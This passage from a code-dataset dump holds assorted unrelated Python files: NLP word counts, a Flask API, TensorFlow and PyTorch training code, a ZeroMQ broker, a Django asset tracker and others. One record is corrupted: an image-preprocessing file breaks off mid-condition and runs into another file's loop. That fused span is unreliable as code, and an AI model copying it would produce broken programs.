= nltk.tokenize.word_tokenize( line )\n for word in line:\n wordcount[word] = wordcount.get(word, 0) + 1\n\n # sort by count\n d = [(v,k) for k,v in wordcount.items()]\n d.sort() # sort\n d.reverse() # reverse order\n for count, word in d[:10]: # show the top 10 entries\n count = str(count) # convert the count to a string\n word = str(word) # convert the word to a string\n g.write ( \" \" + count ) # write the count\n g.write ( \" \" + word + \"\\n\" ) # write the word\n \n f.close() # close the file\n g.close() # close the file\n","sub_path":"freq_nltk.py","file_name":"freq_nltk.py","file_ext":"py","file_size_in_byte":1049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"421846244","text":"# coding=utf-8\nimport logging\n\nfrom flask import Blueprint\n# from flask_restplus import Api\nfrom ..extensions.custom_api import CustomApi\nfrom ..extensions.exceptions import global_error_handler\n\n# Import all necessary API NameSpaces here\n# from .user import ns as user_ns\nfrom .branch import ns as branch_ns\nfrom .location import ns as location_ns\nfrom .warehouse import ns as warehouse_ns\nfrom .srm_product import ns as srm_product_ns\nfrom .stock_quant import ns as stock_quant_ns\nfrom .stock_out import ns as stock_out_ns\nfrom .internal_api import ns as internal_api_ns\nfrom .eton_api import ns as eton_api_ns\n\n__author__ = 'ThucNC'\n_logger = logging.getLogger('api')\n\napi_wms = Blueprint('api', __name__, url_prefix='/api/v2')\n\ncustom_definition = {\n 'info': {\n 'x-logo': {\n 'url': 'https://teko-vn.github.io/api-docs/Teko-Logo-01.svg'\n }\n },\n}\n\napi = CustomApi(\n app=api_wms,\n version='1.0',\n title='Teko WMS API Specification',\n validate=False,\n description='This documentation describes APIs used in/exposed from Teko micro-services ecosystem \\\n # Introduction\\\n These specifications are following\\\n [OpenAPI 3.0.0 
format](https://github.com/OAI/OpenAPI-Specification/blob/master/versions/3.0.0.md).',\n license='Apache 2.0',\n license_url='http://www.apache.org/licenses/LICENSE-2.0.html',\n contact_email='son.lp@teko.vn'\n # doc='' # disable Swagger UI\n)\n\n# add custom definition\napi.add_custom_definition(custom_definition)\n\n\ndef init_app(app, **kwargs):\n \"\"\"\n :param flask.Flask app: the app\n :param kwargs:\n :return:\n \"\"\"\n # Add all necesary namespace here\n # api.add_namespace(user_ns)\n api.add_namespace(branch_ns, tag_group_name='WMS', path='/branches')\n api.add_namespace(warehouse_ns, tag_group_name='WMS', path='/warehouses')\n api.add_namespace(location_ns, tag_group_name='WMS', path='/locations')\n api.add_namespace(stock_quant_ns, tag_group_name='WMS', path='/stock_quants')\n api.add_namespace(stock_out_ns, tag_group_name='WMS', path='/stock_out')\n\n api.add_namespace(srm_product_ns, tag_group_name='SRM', path='/srm_products')\n api.add_namespace(internal_api_ns, tag_group_name='WMS', path='/internals')\n\n api.add_namespace(eton_api_ns, tag_group_name='WMS', path='/external')\n\n app.register_blueprint(api_wms)\n api.error_handlers[Exception] = global_error_handler\n","sub_path":"wms/api/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"83800750","text":"import tensorflow as tf\nimport datetime\nfrom tensorflow.python.framework import graph_util\nfrom face_ID_net.read_image import *\ndef face_net(batch_size,height, width, n_classes,learning_rate=0.001,margin=0.3,run_train=True):\n x = tf.placeholder(tf.float32, shape=[None, height, width, 3], name='input')\n def weight_variable(shape, name=\"weights\"):\n initial = tf.truncated_normal(shape, dtype=tf.float32, stddev=0.1)\n return tf.Variable(initial, name=name)\n\n def bias_variable(shape, name=\"biases\"):\n initial = tf.constant(0.1, dtype=tf.float32, shape=shape)\n return tf.Variable(initial, name=name)\n\n with tf.variable_scope('conv1') as scope:\n W1 = weight_variable([3, 3, 3, 32])\n b1 = bias_variable([32])\n conv = tf.nn.conv2d(x, W1, strides=[1, 1, 1, 1], padding=\"SAME\")\n pre_activation = tf.nn.bias_add(conv, b1)\n relu1 = tf.nn.relu(pre_activation, name=\"relu1\")\n\n with tf.variable_scope('conv2') as scope:\n W2 = weight_variable([3, 3, 32, 64])\n b2 = bias_variable([64])\n conv2 = tf.nn.conv2d(relu1, W2, strides=[1, 2, 2, 1], padding='SAME')\n relu2 = tf.nn.relu(tf.nn.bias_add(conv2, b2), name='relu2')\n\n with tf.variable_scope('conv3') as scope:\n W3 = weight_variable([3, 3, 64, 128])\n b3 = bias_variable([128])\n conv3 = tf.nn.conv2d(relu2, W3, strides=[1, 1, 1, 1], padding='SAME')\n relu3 = tf.nn.relu(tf.nn.bias_add(conv3, b3), name='relu3')\n\n with tf.variable_scope('conv4') as scope:\n W4 = weight_variable([3, 3, 128, 256])\n b4 = bias_variable([256])\n conv4 = tf.nn.conv2d(relu3, W4, strides=[1, 2, 2, 1], padding='SAME')\n relu4 = tf.nn.relu(tf.nn.bias_add(conv4, b4), name='relu4')\n\n with tf.variable_scope('conv5') as scope:\n W5 = weight_variable([3, 3, 256, 512])\n b5 = bias_variable([512])\n conv5 = tf.nn.conv2d(relu4, W5, strides=[1, 1, 1, 1], padding='SAME')\n relu5 = tf.nn.relu(tf.nn.bias_add(conv5, b5), name='relu5')\n\n with tf.variable_scope('conv6') as scope:\n W6 = weight_variable([3, 3, 512, 1024])\n b6 = bias_variable([1024])\n conv6 = tf.nn.conv2d(relu5, W6, strides=[1, 1, 1, 1], padding='SAME')\n relu6 = tf.nn.relu(tf.nn.bias_add(conv6, b6), 
name='relu6')\n\n with tf.variable_scope('conv7') as scope:\n W7 = weight_variable([3, 3, 1024, 256])\n b7= bias_variable([256])\n conv7 = tf.nn.conv2d(relu6, W7, strides=[1, 1, 1, 1], padding='SAME')\n relu7 = tf.nn.relu(tf.nn.bias_add(conv7, b7), name='relu7')\n\n # fully connected layers\n with tf.variable_scope(\"fc1\") as scope:\n dim = int(np.prod(relu7.get_shape()[1:]))\n reshape = tf.reshape(relu7, [-1, dim])\n print(\"flattened dim\",dim)\n weights1 =weight_variable([dim, 256]) ##24*24*256*256\n biases1 = bias_variable([256])\n fc1 = tf.nn.dropout(tf.nn.relu(tf.matmul(reshape, weights1) + biases1, name=\"fc1\"),0.5)\n\n with tf.variable_scope(\"fc2\") as scope:\n weights122 =weight_variable([256, 1024])\n biases122 = bias_variable([1024])\n fc2 = tf.nn.dropout(tf.nn.relu(tf.matmul(fc1, weights122) + biases122, name=\"fc2\"),0.5)\n\n with tf.variable_scope(\"output\") as scope:\n weights2 = weight_variable([1024, n_classes])\n biases2 = bias_variable([n_classes])\n y_conv=tf.add(tf.matmul(fc2, weights2),biases2, name=\"output\")\n\n if run_train==True:\n print('final layer output',y_conv)\n anchor_out = tf.slice(y_conv, [ 0, 0], [1, n_classes])\n positive_out = tf.slice(y_conv, [ 1, 0], [1, n_classes])\n negative_out = tf.slice(y_conv, [ 2, 0], [1, n_classes])\n d_pos = tf.norm(anchor_out - positive_out, axis=1)\n print('d_pos', d_pos)\n # d_neg = tf.reduce_sum(tf.square(anchor_out - negative_out), 1)\n d_neg = tf.norm(anchor_out - negative_out, axis=1)\n loss = tf.maximum(0.0, margin + d_pos - d_neg)\n print('loss', loss)\n loss = tf.reduce_mean(loss)# + tf.reduce_mean(d_pos)\n optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate)\n global_step = tf.Variable(0, name=\"global_step\", trainable=False)\n train_op = optimizer.minimize(loss, global_step=global_step)\n return dict(\n x=x,\n loss=loss,\n optimize=train_op,\n d_pos=d_pos,\n d_neg=d_neg,\n )\n else:\n anchor_out = tf.slice(y_conv, [0, 0], [1,n_classes])\n return dict(\n x=x,\n anchor_out=anchor_out,\n )\n","sub_path":"face_ID_net/ID_pb_net.py","file_name":"ID_pb_net.py","file_ext":"py","file_size_in_byte":4607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"101393750","text":"#@+leo-ver=5-thin\n#@+node:ekr.20160517182239.1: * @file ../../flake8-leo.py\n\"\"\"\nThis file runs flake8 on predefined lists of files.\n\nOn windows, the following .bat file runs this file::\n python flake8-leo.py %*\n\nOn Ubuntu, the following alias runs this file::\n pyflake=\"python pyflake-leo.py\"\n\"\"\"\n#@@language python\n#@@tabwidth -4\n# pylint: disable=invalid-name\n # flake8-leo isn't a valid module name, but it isn't a module.\nimport leo.core.leoGlobals as g\nimport leo.core.leoTest as leoTest\nimport optparse\nimport os\nimport time\n\n#@+others\n#@+node:ekr.20160517182239.10: ** main & helpers\ndef main(files):\n \"\"\"Call run on all tables in tables_table.\"\"\"\n try:\n from flake8 import engine\n except Exception:\n print(f'{g.shortFileName(__file__)}: can not import flake8')\n return\n config_file = get_flake8_config()\n if config_file:\n style = engine.get_style_guide(parse_argv=False, config_file=config_file)\n t1 = time.time()\n check_all(files, style)\n t2 = time.time()\n n = len(files)\n print('%s file%s, time: %5.2f sec.' 
% (n, g.plural(n), t2 - t1))\n#@+node:ekr.20160517222900.1: *3* get_home\ndef get_home():\n \"\"\"Returns the user's home directory.\"\"\"\n home = g.os_path_expanduser(\"~\")\n # Windows searches the HOME, HOMEPATH and HOMEDRIVE\n # environment vars, then gives up.\n if home and len(home) > 1 and home[0] == '%' and home[-1] == '%':\n # Get the indirect reference to the true home.\n home = os.getenv(home[1:-1], default=None)\n if home:\n # Important: This returns the _working_ directory if home is None!\n # This was the source of the 4.3 .leoID.txt problems.\n home = g.os_path_finalize(home)\n if not g.os_path_exists(home) or not g.os_path_isdir(home):\n home = None\n return home\n#@+node:ekr.20160517222236.1: *3* get_flake8_config\ndef get_flake8_config():\n \"\"\"Return the path to the flake8 configuration file.\"\"\"\n join = g.os_path_finalize_join\n homeDir = get_home()\n loadDir = g.os_path_finalize_join(g.__file__, '..', '..')\n base_table = ('flake8', 'flake8.txt')\n dir_table = (\n homeDir,\n join(homeDir, '.leo'),\n join(loadDir, '..', '..', 'leo', 'test'),\n )\n for base in base_table:\n for path in dir_table:\n fn = g.os_path_abspath(join(path, base))\n if g.os_path_exists(fn):\n return fn\n print('no flake8 configuration file found in\\n%s' % ('\\n'.join(dir_table)))\n return None\n#@+node:ekr.20160517222332.1: *3* check_all\ndef check_all(files, style):\n \"\"\"Run flake8 on all paths.\"\"\"\n from flake8 import main\n\n report = style.check_files(paths=files)\n main.print_report(report, style)\n#@+node:ekr.20160517182239.11: ** report_version\ndef report_version():\n try:\n import flake8\n\n print('flake8 version: %s' % flake8.__version__)\n except ImportError:\n g.trace('can not import flake8')\n#@+node:ekr.20160517182239.15: ** scanOptions\ndef scanOptions():\n \"\"\"Handle all options, remove them from sys.argv.\"\"\"\n global g_option_fn\n # This automatically implements the -h (--help) option.\n parser = optparse.OptionParser()\n add = parser.add_option\n add('-a', action='store_true', help='all')\n add('-c', action='store_true', help='core')\n add('-e', action='store_true', help='external')\n add('-f', dest='filename', help='filename, relative to leo folder')\n add('-g', action='store_true', help='gui plugins')\n add('-m', action='store_true', help='modes')\n add('-p', action='store_true', help='plugins')\n # add('-s', action='store_true', help='silent')\n add('-u', action='store_true', help='user commands')\n add('-v', '--version', dest='v', action='store_true', help='report flake8 version')\n # Parse the options.\n options, args = parser.parse_args()\n # silent = options.s\n if options.a:\n scope = 'all'\n elif options.c:\n scope = 'core'\n elif options.e:\n scope = 'external'\n elif options.filename:\n fn = options.filename\n if fn.startswith('='):\n fn = fn[1:]\n g_option_fn = fn.strip('\"')\n scope = 'file'\n elif options.g:\n scope = 'gui'\n elif options.m:\n scope = 'modes'\n elif options.p:\n scope = 'plugins'\n # elif options.s: scope = 'silent'\n elif options.u:\n scope = 'commands'\n elif options.v:\n scope = 'version'\n else:\n scope = 'all'\n return scope\n#@-others\ng_option_fn = None\nscope = scanOptions()\nif scope == 'version':\n report_version()\nelse:\n files = leoTest.LinterTable().get_files_for_scope(scope, fn=g_option_fn)\n main(files)\n#@-leo\n","sub_path":"flake8-leo.py","file_name":"flake8-leo.py","file_ext":"py","file_size_in_byte":4735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} 
+{"seq_id":"272936686","text":"#!/usr/bin/python\r\n\r\nfrom math import *\r\n\r\ndef _merge(a, p, q, r):\r\n s = []\r\n u = p\r\n v = q + 1\r\n while u <= q and v <= r:\r\n if a[u] <= a[v]:\r\n s.append(a[u])\r\n u = u + 1\r\n else:\r\n s.append(a[v])\r\n v = v + 1\r\n if v > r:\r\n for i in range(u, q + 1):\r\n s.append(a[i])\r\n else:\r\n for i in range(v, r + 1):\r\n s.append(a[i]) \r\n a[p:r + 1] = s[:]\r\n \r\ndef merge_sort(a, p, r):\r\n if p < r:\r\n q = int(floor((p + r)/2))\r\n merge_sort(a, p, q)\r\n merge_sort(a, q + 1, r)\r\n _merge(a, p, q, r)","sub_path":"sort/merge_sort.py","file_name":"merge_sort.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"123156133","text":"from multiprocessing import Process, Queue\nimport json\nimport zmq\n\ndef ClientJSONRouter(addr, queue):\n \"\"\"\n Broker endpoint for django client\n \"\"\"\n context = zmq.Context()\n socket = context.socket(zmq.ROUTER)\n socket.bind(addr)\n while True:\n msg = []\n msg.append(socket.recv())\n msg.append(socket.recv())\n msg.append(socket.recv_json())\n msg[2] = json.loads(msg[2])\n try:\n queue.put(msg[2].get('token'))\n socket.send_multipart(\n (msg[0], msg[1], json.dumps({\"code\": 201}).encode('utf-8'))\n )\n except Exception as e:\n print(e)\n socket.send_multipart(\n (msg[0], msg[1], json.dumps({\"code\": 400}).encode('utf-8'))\n )\n \ndef WorkerJSONRouter(addr, queue):\n \"\"\"\n Broker endpoint for workgroups\n \"\"\"\n context = zmq.Context()\n socket = context.socket(zmq.ROUTER)\n socket.bind(addr)\n while True:\n msg = []\n msg.append(socket.recv())\n msg.append(socket.recv())\n msg.append(socket.recv_json())\n try:\n token = queue.get(block=False)\n socket.send_multipart(\n (\n msg[0], \n msg[1], \n json.dumps({\"token\": token, \"code\": 200}).encode('utf-8')\n )\n )\n except:\n socket.send_multipart(\n (\n msg[0],\n msg[1],\n json.dumps({\"token\": \"\",\"code\": 204}).encode('utf-8')\n )\n )\n\ndef JSONBroker(addr1, addr2):\n message_queue = Queue()\n Process(target=ClientJSONRouter, args=(addr1, message_queue,)).start()\n Process(target=WorkerJSONRouter, args=(addr2, message_queue,)).start()\n \nif __name__ == \"__main__\":\n JSONBroker(\"tcp://127.0.0.1:30000\",\"tcp://127.0.0.1:30001\")\n\n","sub_path":"analysis/broker_job.py","file_name":"broker_job.py","file_ext":"py","file_size_in_byte":1919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"455473803","text":"from PIL import Image\nimport numpy as np\n\n# Deprecated\ndef calculate_new_positions(x, y, radius):\n factor = radius\n return {\n 'top': [x ,y -radius],\n 'bottom': [x, y + radius],\n 'left': [x - radius, y],\n 'right': [x + radius, y],\n 'top_left': [x -radius, y-radius],\n 'bottom_left': [x-radius, y+radius],\n 'top_right': [x+radius,y-radius],\n 'bottom_right': [x+radius,y+radius]\n }\n\n\ndef extract_submatrix(x, y, height, width, image_data, radius, weight):\n x_min = x - radius\n # The plus one (+1) is to also include the last element\n x_max = x + radius + 1\n y_min = y - radius\n y_max = y + radius + 1\n\n # Boundary conditions\n if x_min < 0:\n x_min = 0\n elif x_max > width:\n x_max = width - 1\n if y_min < 0:\n y_min = 0\n elif y_max > height:\n y_max = height - 1\n\n # Multiplies the center pixel by the weight\n image_data[y][x] = image_data[y][x]*weight\n\n submatrix = image_data[y_min:y_max, x_min:x_max]\n height, width, last = submatrix.shape\n\n return submatrix, 
height, width\n\n\ndef save_new_image(data, name):\n im2 = Image.fromarray(data.astype('uint8'))\n im2.save(name)\n\n\ndef open_image(image):\n try:\n img = Image.open(image)\n img = img.convert('RGBA')\n width, height = img.size\n except :\n exit('Por favor, informe uma imagem válida.')\n\n return img, width, height\n\n\ndef get_image_data(image):\n return np.array(image).astype('int64')\n\n\ndef calculate_new_color(image_data, weight, height, width):\n rgba_sum = np.sum(image_data, axis=(1, 0))\n\n denominator = (height * width - 1) + weight\n\n new_color = np.round(rgba_sum / denominator)\n\n return new_color\n\n","sub_path":"util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":1744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"123651794","text":"# -*- coding: utf-8 -*-\n# @Time : 2018/6/22 20:57\n# @Author : Li Jiawei\n# @FileName: imagesPreprocessing.py\n# @Software: PyCharm\n\nimport cv2\nimport os\nimport numpy as np\n\nIMAGE_SIZE=64\n\ndef resize_image(image,height=IMAGE_SIZE,width=IMAGE_SIZE):\n top,bottom,left,right=(0,0,0,0)\n\n h,w,_=image.shape\n\n longest_edge=max(h,w)\n\n if h32:\n\n buffer = np.empty((16,80,100, 3), np.dtype('float32'))\n count = 0\n retaining = True\n j=0\n while (count < frame_count and retaining and j<16):\n retaining, frame = capture.read()\n if count == sample[j]:\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n buffer[j] = frame\n j+=1\n count += 1\n \n buffer = buffer.transpose((3, 0, 1, 2)) \n buffer = (buffer - 128)/128\n dataset[c].append(buffer)\n for c in commands:\n np.save(os.path.join(tr_path,c)+\".npy\",np.stack(dataset[c])[:-10])\n np.save(os.path.join(ts_path,c)+\".npy\",np.stack(dataset[c])[-10:])\nif __name__ == \"__main__\":\n commands = [\"black\",\"cancel\",\"centeralign\",\"copy\",\"large\",\"medium\",\"newslide\",\"paste\",\"red\",\"textbox\"]\n data_prep(hp.data.dataset,hp.data.train_path,hp.data.test_path)\n\n","sub_path":"data_prepare.py","file_name":"data_prepare.py","file_ext":"py","file_size_in_byte":1587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"246939953","text":"import torch\nimport warnings\nimport torch.nn as nn\nimport torch.optim as optim\nfrom . 
import lr_scheduler\nimport inspect\nfrom inspect import Signature, Parameter\nfrom collections import OrderedDict\nfrom copy import copy\nfrom typing import Tuple, List, Union, Type, Any, Dict\nfrom tqdm import tqdm\n\nimport vortex.utils.type_utils as type_utils\nfrom vortex.utils.logger.base_logger import ExperimentLogger\n\nclass BaseTrainer(object):\n __loss_parameters__ = ['input', 'target']\n def __init__(self, model: Type[nn.Module], optimizer: Union[Type[optim.Optimizer], Tuple[str, Dict], Dict[str,Any]], \n scheduler: Union[Type[optim.lr_scheduler._LRScheduler], Tuple[str, Dict[str, Any], Dict[str,Any]]], \n criterion: Type[nn.Module], experiment_logger : Union[Type[ExperimentLogger],None] = None,check_annotations: bool = True):\n\n self.model = model\n self.optimizer = type(self).create_optimizer(optimizer, self.model)\n self.scheduler = type(self).create_scheduler(scheduler, self.optimizer)\n self.criterion = criterion\n self.experiment_logger = experiment_logger\n self.global_step = 0\n\n self._check_model()\n \n def _check_model(self, strict=False, check_annotations=True):\n \"\"\"\n check model and loss, called after model, loss, optim, scheduler are assigned\n can be bypassed from derived class by overriding this method\n strict mode can be set from derived class by overriding this method and \n pass strict=True\n \"\"\"\n model_signature = inspect.signature(self.model.forward)\n loss_signature = inspect.signature(self.criterion.forward)\n criterion_args = type(self).__loss_parameters__\n\n ## force loss fn signature has parameter named 'input' and 'targets'\n args_exist = all(arg in loss_signature.parameters for arg in criterion_args)\n model_return_anno = model_signature.return_annotation\n args_not_exist_msg = \"loss function {} does not have {} args\".format(\n type(self.criterion), ', '.join(criterion_args)\n )\n ## assuming first name of loss param is input name\n loss_input_name = criterion_args[0]\n loss_input_anno = loss_signature.parameters[loss_input_name].annotation \\\n if loss_input_name in loss_signature.parameters else None\n anno_mismatch_msg = \"model return annotation does not match with loss input annotation, \\\n {model_anno} with {loss_anno}\".format_map(dict(\n model_anno=model_return_anno,\n loss_anno=loss_input_anno,\n ))\n def raise_error(cond, msg, exc=TypeError):\n if not cond:\n raise exc(msg)\n def emit_warning(cond, msg):\n if not cond:\n warnings.warn(msg)\n warn_or_error = raise_error if strict else emit_warning\n warn_or_error(args_exist,args_not_exist_msg)\n if not check_annotations:\n return\n return_type_annotated = model_return_anno != Signature.empty\n loss_input_annotated = loss_input_anno is not None\n warn_or_error(return_type_annotated, \"return type not annotated\")\n warn_or_error(loss_input_annotated, \"loss input not annotated\")\n match = return_type_annotated and loss_input_annotated and type_utils.match_annotation(model_return_anno,loss_input_anno)\n warn_or_error(match, \"annotation mismatch\")\n \n \n @staticmethod\n def create_optimizer(optimizer: Union[optim.Optimizer, tuple, dict], model: Type[nn.Module]):\n \"\"\"\n create optimizer\n \"\"\"\n if isinstance(optimizer, tuple):\n warnings.warn(\"creating optimizer from tuple is deprecated\", PendingDeprecationWarning)\n assert (len(optimizer) == 2), \"expect length of optimizer is 2 if type of tuple\"\n assert isinstance(optimizer[0], str), \"expect optimizer is type of Tuple[str,Dict], got optimizer[0] : %s\" % (\n type(optimizer[0]))\n assert isinstance(optimizer[1], 
dict), \"expect optimizer is type of Tuple[str,Dict], got optimizer[0] : %s\" % (\n type(optimizer[1]))\n optimizer = dict(\n module=optimizer[0],\n args=optimizer[1],\n )\n if isinstance(optimizer, dict):\n if 'method' in optimizer and not 'module' in optimizer:\n optimizer.update({'module': optimizer['method']})\n opt_method, kwargs = optimizer['module'], optimizer['args']\n if opt_method.startswith('optim.'):\n opt_method = opt_method.replace('optim.','')\n assert hasattr(optim, opt_method), \\\n \"unsupported optimizer {}\".format(opt_method)\n kwargs.update({'params' : model.parameters()})\n optimizer = getattr(optim, opt_method)(**kwargs)\n return optimizer\n\n @staticmethod\n def create_scheduler(scheduler, optimizer):\n \"\"\"\n create scheduler\n \"\"\"\n if isinstance(scheduler, tuple):\n warnings.warn(\"creating scheduler from tuple is deprecated\", PendingDeprecationWarning)\n if scheduler[0] is None:\n return None\n assert len(scheduler) == 2, \"expect lenth of scheduler is 2 if type of tuple\"\n assert isinstance(scheduler[0], str), \"expect scheduler is type of Tuple[str,Dict], got scheduler[0] : %s\" % (\n type(scheduler[0]))\n assert isinstance(scheduler[1], dict), \"expect scheduler is type of Tuple[str,Dict], got scheduler[1] : %s\" % (\n type(scheduler[1]))\n scheduler = dict(\n module=scheduler[0],\n args=scheduler[1],\n )\n if isinstance(scheduler, dict):\n if 'method' in scheduler and not 'module' in scheduler:\n scheduler.update({'module': scheduler['method']})\n sch_method, kwargs = scheduler['module'], scheduler['args']\n assert hasattr(lr_scheduler, sch_method), \\\n \"unsupported lr_scheduler {}\".format(sch_method)\n kwargs.update({'optimizer': optimizer})\n scheduler = getattr(lr_scheduler, sch_method)(**kwargs)\n return scheduler\n\n def train(self, dataloader, epoch: int):\n raise NotImplementedError\n \n def __call__(self, dataloader, epoch: int):\n is_training = self.model.training\n self.model.train()\n train_results = self.train(dataloader, epoch)\n self.model.train(is_training)\n return train_results","sub_path":"vortex/core/engine/trainer/base_trainer.py","file_name":"base_trainer.py","file_ext":"py","file_size_in_byte":6589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"457698960","text":"import time\n\ndef test_basket_button(browser):\n browser.get('http://selenium1py.pythonanywhere.com/catalogue/coders-at-work_207/')\n time.sleep(10)\n basket_button = browser.find_elements_by_css_selector(\".btn-add-to-basket\")\n result = False\n if len(basket_button) == 1:\n result = True\n assert result, \"А где же кнопочка??? 
Или их так много...\"\n","sub_path":"selenium_course/test_imarket/test_items.py","file_name":"test_items.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"652128159","text":"'''import requests\n\nurl = \"https://thevirustracker.com/free-api?global=stats\"\n\npayload = {}\nheaders= {}\n\nresponse = requests.request(\"GET\", url, headers=headers, data = payload)\n\nsachin = response.text.encode('utf8')\n\n\ndata = open('file.txt','w')\ndata.write(str(sachin))\ndata.close()'''\n\n\n# load text\nfile = open('file.txt', 'rt')\ntext = file.read()\nfile.close()\n# split based on words only\nimport re\nwords = re.split(r'\\W+', text)\n#-----this is for total cases----\ntotal_cases = words.index('total_cases')+1\nprint('total_cases',words[total_cases])\n\n#------this is for total_recovered\n\ntotal_recovered = words.index('total_recovered')+1\nprint('total_recovered',words[total_recovered])\n\n#------this is for the total_deaths\n\ntotal_deaths = words.index('total_deaths')+1\nprint('total_deaths',words[total_deaths])\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"sachin.py","file_name":"sachin.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"583778048","text":"'''\r\nstatus:\r\n200 成功全部录入\r\n300 id号没有,新增ID号,需要客户端录入id号\r\n301 新资产,正在等待管理员录入\r\n401 字段错误\r\n403 其他错误\r\n'''\r\nimport json\r\nfrom asset import models\r\n\r\nfrom utils.tools import JsonRet\r\n\r\n\r\nclass AssetFactory(object):\r\n def __init__(self,request):\r\n self.request=request\r\n self.response=JsonRet()\r\n self.madatory_field=[\"asset_id\",\"asset_type\",\"sn\"]\r\n self.waiting_approval=False\r\n self.clean_data=None\r\n\r\n\r\n # ['cpu', 'asset_type', 'os_type', 'manufacturer', 'nic', 'sn', 'ram', 'disk']\r\n\r\n def madatory_check(self,data):\r\n '''\r\n 1,检查字段是否合法\r\n 2,用id和sn判断数据库是否匹配\r\n 3,没匹配是新资产,返回False,匹配返回True\r\n '''\r\n try:\r\n for field in self.madatory_field:\r\n if field not in data:\r\n\r\n raise ValueError(\"the [%s] field is not found\" % (field))\r\n except ValueError as e:\r\n self.response.info_error(401,e.args)\r\n return False\r\n\r\n if not data.get(\"asset_id\"): # 单纯的新资产\r\n\r\n try:\r\n self.asset_obj = models.Asset.objects.get(sn=data[\"sn\"])\r\n except models.models.ObjectDoesNotExist as e: #新资产\r\n self.waiting_approval = True\r\n self.response.info_error(301, \"资产等待录入\")\r\n else: #老资产,id丢了;新资产,已经通过审核 data[\"asset_id\"] = self.asset_obj.id\r\n data[\"asset_id\"]=self.asset_obj.id\r\n self.response.info_data(201, {\"asset_id\": self.asset_obj.id})\r\n\r\n else: #我有资产id,这个id是不是假的先用sn判断,如果sn是真的,是老资产,如果sn不是真的,\r\n # 在asset_id为真的情况下说明是换主板了,如果id也是假的,说明是新资产\r\n try:\r\n self.asset_obj = models.Asset.objects.get(sn=data[\"sn\"])\r\n except models.models.ObjectDoesNotExist as e:\r\n try:\r\n self.asset_obj = models.Asset.objects.get(id=data[\"asset_id\"])\r\n except models.models.ObjectDoesNotExist as e: #新资产\r\n self.response.info_error(301, \"资产等待录入\")\r\n self.clean_data = data\r\n self.save_new_asset_approval()\r\n\r\n else: #换主板了\r\n self.response.info_error(202, \"数据更新提示\")\r\n\r\n else:#有该资产,直接修改\r\n data[\"asset_id\"]=self.asset_obj.id\r\n self.response.status=201\r\n self.response.data={\"asset_id\": self.asset_obj.id}\r\n self.response.error=\"直接修改\"\r\n\r\n\r\n\r\n def get_asset_id_by_sn(self):\r\n #如果asset_id没有\r\n asset_data=self.request.POST.get(\"asset_data\")\r\n\r\n 
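# comment (added for clarity): the client is expected to POST the asset payload as a JSON string under the \"asset_data\" key; json.loads below will raise on malformed input\r\n        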
asset_data=json.loads(asset_data)\r\n\r\n self.madatory_check(asset_data)\r\n\r\n if self.response.status==301:\r\n if self.waiting_approval:\r\n self.clean_data=asset_data\r\n self.save_new_asset_approval()\r\n\r\n\r\n\r\n def save_new_asset_approval(self):\r\n # try:\r\n #如果new_asset中有相同的sn,就不用再添加\r\n try:\r\n repeat=models.NewAssetApprovalZone.objects.filter(sn=self.clean_data.get(\"sn\"))\r\n if not repeat.first():\r\n models.NewAssetApprovalZone.objects.get_or_create(asset_type=self.clean_data.get(\"asset_type\"),\r\n sn=self.clean_data.get(\"sn\"),\r\n model=self.clean_data.get(\"model\"),\r\n os_type=self.clean_data.get(\"os_type\"),\r\n manufacturer=self.clean_data.get(\"manufacturer\"),\r\n content_data=json.dumps(self.clean_data)\r\n )\r\n except Exception as e:\r\n # 403 录入错误\r\n self.response.info_error(403,e.args)\r\n\r\n\r\n def get_asset_by_sn(self,db_obj=None):\r\n '''找好位置\r\n '''\r\n\r\n data_set={\r\n \"sn\":db_obj.sn,\r\n \"model\":db_obj.model\r\n }\r\n asset_obj,flag=models.Asset.objects.get_or_create(**data_set)\r\n self.asset_obj=asset_obj\r\n return True\r\n\r\n def data_is_valid(self,request):\r\n data=request.POST.get(\"asset_data\")\r\n if data:\r\n try:\r\n data=json.loads(data)\r\n self.madatory_check(data)\r\n if self.response.status == 201:\r\n self.clean_data=data\r\n return True\r\n else:\r\n return False\r\n except Exception as e:\r\n #403 值错误 data数据不符合要求\r\n self.response.info_error(403, \"data数据不符合要求\")\r\n return False\r\n pass\r\n else:\r\n #403 没有资产数据\r\n self.response.info_error(403, \"没有资产数据\")\r\n return False\r\n pass\r\n\r\n pass\r\n\r\n def _is_new_asset(self):\r\n '''\r\n 新资产没有asset_type\r\n :return:\r\n '''\r\n if not self.asset_obj.asset_type:\r\n return True\r\n else:\r\n return False\r\n\r\n\r\n\r\n def data_inject(self,data=None):\r\n '''\r\n 注入到数据库,一种是从admin注入,是创建一条资产,admin过来有db_obj,\r\n 如果是更新数据,则是从客户端过来的,就没有db_obj\r\n :param asset_data:\r\n :return:\r\n '''\r\n #如果\r\n if not data: #说明从客户端过来\r\n data = self.request.POST.get(\"asset_data\")\r\n\r\n data=json.loads(data)\r\n self.madatory_check(data)\r\n\r\n if self.response.status >= 200 and self.response.status < 300: #修改\r\n print(self.response.status)\r\n self.response.error=None\r\n self.response.status=0\r\n self.clean_data = data\r\n if self._is_new_asset():\r\n 